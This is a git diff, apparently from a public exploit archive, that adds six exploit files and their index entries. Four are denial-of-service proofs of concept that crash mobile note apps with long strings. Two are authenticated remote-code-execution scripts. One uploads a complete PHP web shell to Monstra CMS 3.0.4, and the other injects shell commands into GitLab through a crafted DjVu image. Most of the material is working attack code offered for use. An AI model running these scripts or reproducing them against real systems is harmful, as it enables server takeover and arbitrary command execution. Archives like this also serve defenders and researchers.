diff --git a/exploits/android/dos/49946.txt b/exploits/android/dos/49946.txt
new file mode 100644
index 000000000..6434b7f5c
--- /dev/null
+++ b/exploits/android/dos/49946.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)
+# Date: 2021-06-03
+# Author: Brian Rodríguez
+# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX
+# Version: 4.3.61
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 50000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49952.py b/exploits/ios/dos/49952.py
new file mode 100755
index 000000000..a131a0ad6
--- /dev/null
+++ b/exploits/ios/dos/49952.py
@@ -0,0 +1,35 @@
+# Exploit Title: Color Notes 1.4 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136
+# Version: 1.4
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49953.py b/exploits/ios/dos/49953.py
new file mode 100755
index 000000000..6f509fc40
--- /dev/null
+++ b/exploits/ios/dos/49953.py
@@ -0,0 +1,35 @@
+# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221
+# Version: 5.5
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49954.py b/exploits/ios/dos/49954.py
new file mode 100755
index 000000000..94d1838eb
--- /dev/null
+++ b/exploits/ios/dos/49954.py
@@ -0,0 +1,35 @@
+# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781
+# Version: 5.3
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/php/webapps/49949.py b/exploits/php/webapps/49949.py
new file mode 100755
index 000000000..d92fdb924
--- /dev/null
+++ b/exploits/php/webapps/49949.py
@@ -0,0 +1,101 @@
+# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)
+# Date: 03.06.2021
+# Exploit Author: Ron Jost (hacker5preme)
+# Vendor Homepage: https://monstra.org/
+# Software Link: https://monstra.org/monstra-3.0.4.zip
+# Version: 3.0.4
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2018-6383
+# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit
+
+'''
+Description:
+Monstra CMS through 3.0.4 has an incomplete "forbidden types" list that excludes .php (and similar) file extensions
+but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code
+ by uploading a file, a different vulnerability than CVE-2017-18048.
+'''
+
+
+'''
+Import required modules:
+'''
+import argparse
+import requests
+
+
+'''
+User-Input:
+'''
+my_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383')
+my_parser.add_argument('-T', type=str, help='Target IP')
+my_parser.add_argument('-P', type=str, help='Target Port')
+my_parser.add_argument("-U", type=str, help="Monstra CMS Path")
+my_parser.add_argument('-u', type=str, help="Username")
+my_parser.add_argument('-p', type=str, help='Password')
+args = my_parser.parse_args()
+target_ip = args.T
+target_port = args.P
+Monstracms_path = args.U
+username = args.u
+password = args.p
+
+
+'''
+Exploit:
+'''
+# Cookies:
+session = requests.Session()
+url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php'
+cookies = session.get(url).cookies.get_dict()
+value = cookies['PHPSESSID']
+cookies = {
+    "__atuvc": "9%7C22",
+    'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9'
+}
+
+# Construct authentication header:
+headers = {
+    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
+    "Accept-Encoding": "gzip, deflate",
+    "Content-Type": "application/x-www-form-urlencoded",
+    "Origin": "http://" + target_ip,
+    "Connection": "close",
+    "Referer": "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php',
+    "Upgrade-Insecure-Requests": "1"}
+
+# Construct authentication body
+body = {
+    "login": username,
+    "password": password,
+    "login_submit": "Log In"}
+x = requests.post(url, headers=headers, cookies=cookies, data=body)
+
+# Construct Exploit link:
+url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager'
+
+# Construct Exploit header:
+header = {
+    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
+    "Accept-Encoding": "gzip, deflate",
+    "Content-Type": "multipart/form-data; boundary=---------------------------27822155982314896762160847658",
+    "Origin": "http://" + target_ip,
+    "Connection": "close",
+    "Referer": "http://" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager',
+    "Upgrade-Insecure-Requests": "1"
+}
+
+# Construct Exploit data:
+burp0_data = "-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"csrf\"\r\n\r\n1e71963993909d612c40962b401c556b70e9bb3c\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n    $stdout = array();\n\n    if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n        // pass\n    } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n        chdir($cwd);\n        preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n        chdir($match[1]);\n    } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n        chdir($cwd);\n        preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n        return featureDownload($match[1]);\n    } else {\n        chdir($cwd);\n        exec($cmd, $stdout);\n    }\n\n    return array(\n        \"stdout\" => $stdout,\n        \"cwd\" => getcwd()\n    );\n}\n\nfunction featurePwd() {\n    return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n    chdir($cwd);\n    if ($type == 'cmd') {\n        $cmd = \"compgen -c $fileName\";\n    } else {\n        $cmd = \"compgen -f $fileName\";\n    }\n    $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n    $files = explode(\"\\n\", shell_exec($cmd));\n    return array(\n        'files' => $files,\n    );\n}\n\nfunction featureDownload($filePath) {\n    $file = @file_get_contents($filePath);\n    if ($file === FALSE) {\n        return array(\n            'stdout' => array('File not found / no read permission.'),\n            'cwd' => getcwd()\n        );\n    } else {\n        return array(\n            'name' => basename($filePath),\n            'file' => base64_encode($file)\n        );\n    }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n    chdir($cwd);\n    $f = @fopen($path, 'wb');\n    if ($f === FALSE) {\n        return array(\n            'stdout' => array('Invalid path / no write permission.'),\n            'cwd' => getcwd()\n        );\n    } else {\n        fwrite($f, base64_decode($file));\n        fclose($f);\n        return array(\n            'stdout' => array('Done.'),\n            'cwd' => getcwd()\n        );\n    }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n    $response = NULL;\n\n    switch ($_GET[\"feature\"]) {\n        case \"shell\":\n            $cmd = $_POST['cmd'];\n            if (!preg_match('/2>/', $cmd)) {\n                $cmd .= ' 2>&1';\n            }\n            $response = featureShell($cmd, $_POST[\"cwd\"]);\n            break;\n        case \"pwd\":\n            $response = featurePwd();\n            break;\n        case \"hint\":\n            $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n            break;\n        case 'upload':\n            $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n    }\n\n    header(\"Content-Type: application/json\");\n    echo json_encode($response);\n    die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n    <head>\n        <meta charset=\"UTF-8\" />\n        <title>p0wny@shell:~#</title>\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n        <style>\n            html, body {\n                margin: 0;\n                padding: 0;\n                background: #333;\n                color: #eee;\n                font-family: monospace;\n            }\n\n            *::-webkit-scrollbar-track {\n                border-radius: 8px;\n                background-color: #353535;\n            }\n\n            *::-webkit-scrollbar {\n                width: 8px;\n                height: 8px;\n            }\n\n            *::-webkit-scrollbar-thumb {\n                border-radius: 8px;\n                -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n                background-color: #bcbcbc;\n            }\n\n            #shell {\n                background: #222;\n                max-width: 800px;\n                margin: 50px auto 0 auto;\n                box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n                font-size: 10pt;\n                display: flex;\n                flex-direction: column;\n                align-items: stretch;\n            }\n\n            #shell-content {\n                height: 500px;\n                overflow: auto;\n                padding: 5px;\n                white-space: pre-wrap;\n                flex-grow: 1;\n            }\n\n            #shell-logo {\n                font-weight: bold;\n                color: #FF4180;\n                text-align: center;\n            }\n\n            @media (max-width: 991px) {\n                #shell-logo {\n                    font-size: 6px;\n                    margin: -25px 0;\n                }\n\n                html, body, #shell {\n                    height: 100%;\n                    width: 100%;\n                    max-width: none;\n                }\n\n                #shell {\n                    margin-top: 0;\n                }\n            }\n\n            @media (max-width: 767px) {\n                #shell-input {\n                    flex-direction: column;\n                }\n            }\n\n            @media (max-width: 320px) {\n                #shell-logo {\n                    font-size: 5px;\n                }\n            }\n\n            .shell-prompt {\n                font-weight: bold;\n                color: #75DF0B;\n            }\n\n            .shell-prompt > span {\n                color: #1BC9E7;\n            }\n\n            #shell-input {\n                display: flex;\n                box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n                border-top: rgba(255, 255, 255, .05) solid 1px;\n            }\n\n            #shell-input > label {\n                flex-grow: 0;\n                display: block;\n                padding: 0 5px;\n                height: 30px;\n                line-height: 30px;\n            }\n\n            #shell-input #shell-cmd {\n                height: 30px;\n                line-height: 30px;\n                border: none;\n                background: transparent;\n                color: #eee;\n                font-family: monospace;\n                font-size: 10pt;\n                width: 100%;\n                align-self: center;\n            }\n\n            #shell-input div {\n                flex-grow: 1;\n                align-items: stretch;\n            }\n\n            #shell-input input {\n                outline: none;\n            }\n        </style>\n\n        <script>\n            var CWD = null;\n            var commandHistory = [];\n            var historyPosition = 0;\n            var eShellCmdInput = null;\n            var eShellContent = null;\n\n            function _insertCommand(command) {\n                eShellContent.innerHTML += \"\\n\\n\";\n                eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n                eShellContent.innerHTML += escapeHtml(command);\n                eShellContent.innerHTML += \"\\n\";\n                eShellContent.scrollTop = eShellContent.scrollHeight;\n            }\n\n            function _insertStdout(stdout) {\n                eShellContent.innerHTML += escapeHtml(stdout);\n                eShellContent.scrollTop = eShellContent.scrollHeight;\n            }\n\n            function _defer(callback) {\n                setTimeout(callback, 0);\n            }\n\n            function featureShell(command) {\n\n                _insertCommand(command);\n                if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n                    featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n                } else if (/^\\s*clear\\s*$/.test(command)) {\n                    // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n                    eShellContent.innerHTML = '';\n                } else {\n                    makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n                        if (response.hasOwnProperty('file')) {\n                            featureDownload(response.name, response.file)\n                        } else {\n                            _insertStdout(response.stdout.join(\"\\n\"));\n                            updateCwd(response.cwd);\n                        }\n                    });\n                }\n            }\n\n            function featureHint() {\n                if (eShellCmdInput.value.trim().length === 0) return;  // field is empty -> nothing to complete\n\n                function _requestCallback(data) {\n                    if (data.files.length <= 1) return;  // no completion\n\n                    if (data.files.length === 2) {\n                        if (type === 'cmd') {\n                            eShellCmdInput.value = data.files[0];\n                        } else {\n                            var currentValue = eShellCmdInput.value;\n                            eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n                        }\n                    } else {\n                        _insertCommand(eShellCmdInput.value);\n                        _insertStdout(data.files.join(\"\\n\"));\n                    }\n                }\n\n                var currentCmd = eShellCmdInput.value.split(\" \");\n                var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n                var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n                makeRequest(\n                    \"?feature=hint\",\n                    {\n                        filename: fileName,\n                        cwd: CWD,\n                        type: type\n                    },\n                    _requestCallback\n                );\n\n            }\n\n            function featureDownload(name, file) {\n                var element = document.createElement('a');\n                element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n                element.setAttribute('download', name);\n                element.style.display = 'none';\n                document.body.appendChild(element);\n                element.click();\n                document.body.removeChild(element);\n                _insertStdout('Done.');\n            }\n\n            function featureUpload(path) {\n                var element = document.createElement('input');\n                element.setAttribute('type', 'file');\n                element.style.display = 'none';\n                document.body.appendChild(element);\n                element.addEventListener('change', function () {\n                    var promise = getBase64(element.files[0]);\n                    promise.then(function (file) {\n                        makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n                            _insertStdout(response.stdout.join(\"\\n\"));\n                            updateCwd(response.cwd);\n                        });\n                    }, function () {\n                        _insertStdout('An unknown client-side error occurred.');\n                    });\n                });\n                element.click();\n                document.body.removeChild(element);\n            }\n\n            function getBase64(file, onLoadCallback) {\n                return new Promise(function(resolve, reject) {\n                    var reader = new FileReader();\n                    reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n                    reader.onerror = reject;\n                    reader.readAsDataURL(file);\n                });\n            }\n\n            function genPrompt(cwd) {\n                cwd = cwd || \"~\";\n                var shortCwd = cwd;\n                if (cwd.split(\"/\").length > 3) {\n                    var splittedCwd = cwd.split(\"/\");\n                    shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n                }\n                return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n            }\n\n            function updateCwd(cwd) {\n                if (cwd) {\n                    CWD = cwd;\n                    _updatePrompt();\n                    return;\n                }\n                makeRequest(\"?feature=pwd\", {}, function(response) {\n                    CWD = response.cwd;\n                    _updatePrompt();\n                });\n\n            }\n\n            function escapeHtml(string) {\n                return string\n                    .replace(/&/g, \"&\")\n                    .replace(/</g, \"<\")\n                    .replace(/>/g, \">\");\n            }\n\n            function _updatePrompt() {\n                var eShellPrompt = document.getElementById(\"shell-prompt\");\n                eShellPrompt.innerHTML = genPrompt(CWD);\n            }\n\n            function _onShellCmdKeyDown(event) {\n                switch (event.key) {\n                    case \"Enter\":\n                        featureShell(eShellCmdInput.value);\n                        insertToHistory(eShellCmdInput.value);\n                        eShellCmdInput.value = \"\";\n                        break;\n                    case \"ArrowUp\":\n                        if (historyPosition > 0) {\n                            historyPosition--;\n                            eShellCmdInput.blur();\n                            eShellCmdInput.value = commandHistory[historyPosition];\n                            _defer(function() {\n                                eShellCmdInput.focus();\n                            });\n                        }\n                        break;\n                    case \"ArrowDown\":\n                        if (historyPosition >= commandHistory.length) {\n                            break;\n                        }\n                        historyPosition++;\n                        if (historyPosition === commandHistory.length) {\n                            eShellCmdInput.value = \"\";\n                        } else {\n                            eShellCmdInput.blur();\n                            eShellCmdInput.focus();\n                            eShellCmdInput.value = commandHistory[historyPosition];\n                        }\n                        break;\n                    case 'Tab':\n                        event.preventDefault();\n                        featureHint();\n                        break;\n                }\n            }\n\n            function insertToHistory(cmd) {\n                commandHistory.push(cmd);\n                historyPosition = commandHistory.length;\n            }\n\n            function makeRequest(url, params, callback) {\n                function getQueryString() {\n                    var a = [];\n                    for (var key in params) {\n                        if (params.hasOwnProperty(key)) {\n                            a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n                        }\n                    }\n                    return a.join(\"&\");\n                }\n                var xhr = new XMLHttpRequest();\n                xhr.open(\"POST\", url, true);\n                xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n                xhr.onreadystatechange = function() {\n                    if (xhr.readyState === 4 && xhr.status === 200) {\n                        try {\n                            var responseJson = JSON.parse(xhr.responseText);\n                            callback(responseJson);\n                        } catch (error) {\n                            alert(\"Error while parsing response: \" + error);\n                        }\n                    }\n                };\n                xhr.send(getQueryString());\n            }\n\n            document.onclick = function(event) {\n                event = event || window.event;\n                var selection = window.getSelection();\n                var target = event.target || event.srcElement;\n\n                if (target.tagName === \"SELECT\") {\n                    return;\n                }\n\n                if (!selection.toString()) {\n                    eShellCmdInput.focus();\n                }\n            };\n\n            window.onload = function() {\n                eShellCmdInput = document.getElementById(\"shell-cmd\");\n                eShellContent = document.getElementById(\"shell-content\");\n                updateCwd();\n                eShellCmdInput.focus();\n            };\n        </script>\n    </head>\n\n    <body>\n        <div id=\"shell\">\n            <pre id=\"shell-content\">\n                <div id=\"shell-logo\">\n        ___                         ____      _          _ _        _  _   <span></span>\n _ __  / _ \\__      ___ __  _   _  / __ \\ ___| |__   ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_  ..  _|<span></span>\n| |_) | |_| |\\ V  V /| | | | |_| | | (_| \\__ \\ | | |  __/ | |_   |_      _|<span></span>\n| .__/ \\___/  \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_)    |_||_|  <span></span>\n|_|                         |___/  \\____/                                  <span></span>\n                </div>\n            </pre>\n            <div id=\"shell-input\">\n                <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n                <div>\n                    <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n                </div>\n            </div>\n        </div>\n    </body>\n\n</html>\n\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"upload_file\"\r\n\r\nUpload\r\n-----------------------------27822155982314896762160847658--\r\n"
+
+# Exploit:
+x = requests.post(url, headers=header, cookies=cookies, data=burp0_data)
+
+# Finish:
+print('')
+print('Please login in your webrowser and then open the following URL:')
+print('File uploaded to: http://' + target_ip + ':' + target_port + Monstracms_path + 'public/uplaods/shell.phar')
+print('')
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49951.py b/exploits/ruby/webapps/49951.py
new file mode 100755
index 000000000..45e2854a3
--- /dev/null
+++ b/exploits/ruby/webapps/49951.py
@@ -0,0 +1,99 @@
+# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated)
+# Date: 04/06/2021
+# Exploit Author: enox
+# Vendor Homepage: https://about.gitlab.com/
+# Software Link: https://gitlab.com/
+# Version: < 13.10.3
+# Tested On: Ubuntu 20.04
+# Environment: Gitlab 13.10.2 CE
+# Credits: https://hackerone.com/reports/1154542
+
+import requests
+from bs4 import BeautifulSoup
+import random
+import os
+import argparse
+
+parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
+parser.add_argument('-u', help='Username', required=True)
+parser.add_argument('-p', help='Password', required=True)
+parser.add_argument('-c', help='Command', required=True)
+parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
+args = parser.parse_args()
+
+username = args.u
+password = args.p
+gitlab_url = args.t
+command = args.c
+
+session = requests.Session()
+
+# Authenticating
+print("[1] Authenticating")
+r = session.get(gitlab_url + "/users/sign_in")
+soup = BeautifulSoup(r.text, features="lxml")
+token = soup.findAll('meta')[16].get("content")
+
+login_form = {
+    "authenticity_token": token,
+    "user[login]": username,
+    "user[password]": password,
+    "user[remember_me]": "0"
+}
+r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
+
+if r.status_code != 200:
+    exit(f"Login Failed:{r.text}")
+else:
+    print("Successfully Authenticated")
+
+
+# payload creation
+print("[2] Creating Payload ")
+
+payload = f"\" . qx{{{command}}} . \\\n"
+f1 = open("/tmp/exploit","w")
+f1.write('(metadata\n')
+f1.write('        (Copyright "\\\n')
+f1.write(payload)
+f1.write('" b ") )')
+f1.close()
+
+# Checking if djvumake is installed
+check = os.popen('which djvumake').read()
+if (check == ""):
+    exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin")
+
+# Building the payload
+os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit')
+
+
+# Uploading it 
+print("[3] Creating Snippet and Uploading")
+
+# Getting the CSRF token
+r = session.get(gitlab_url + "/users/sign_in")
+soup = BeautifulSoup(r.text, features="lxml")
+csrf = soup.findAll('meta')[16].get("content")
+
+
+cookies = {'_gitlab_session': session.cookies['_gitlab_session']}
+headers = {
+    'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',
+    'Accept': 'application/json',
+    'Accept-Language': 'en-US,en;q=0.5',
+    'Accept-Encoding': 'gzip, deflate',
+    'Referer': f'{gitlab_url}/projects',
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1',
+    'X-Requested-With': 'XMLHttpRequest',
+    'X-CSRF-Token': f'{csrf}'
+}
+files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})}
+
+r = session.post(gitlab_url+'/uploads/user', files=files, cookies=cookies, headers=headers, verify=False)
+
+if r.text != "Failed to process image\n":
+    exit("[-] Exploit failed")
+else:
+    print("[+] RCE Triggered !!")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b72ed94b7..6c6259f25 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6789,6 +6789,10 @@ id,file,description,date,author,type,platform,port
 49939,exploits/android/dos/49939.py,"ColorNote 4.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
 49940,exploits/android/dos/49940.py,"Notepad notes 2.6.7 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
 49941,exploits/android/dos/49941.py,"Blacknote 2.2.1 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
+49946,exploits/android/dos/49946.txt,"Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)",2021-06-04,"Brian Rodriguez",dos,android,
+49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
+49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
+49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -44107,3 +44111,5 @@ id,file,description,date,author,type,platform,port
 49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
 49944,exploits/ruby/webapps/49944.py,"Gitlab 13.9.3 - Remote Code Execution (Authenticated)",2021-06-03,enox,webapps,ruby,
 49945,exploits/php/webapps/49945.txt,"4Images 1.8 - 'redirect' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
+49949,exploits/php/webapps/49949.py,"Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)",2021-06-04,"Ron Jost",webapps,php,
+49951,exploits/ruby/webapps/49951.py,"Gitlab 13.10.2 - Remote Code Execution (Authenticated)",2021-06-04,enox,webapps,ruby,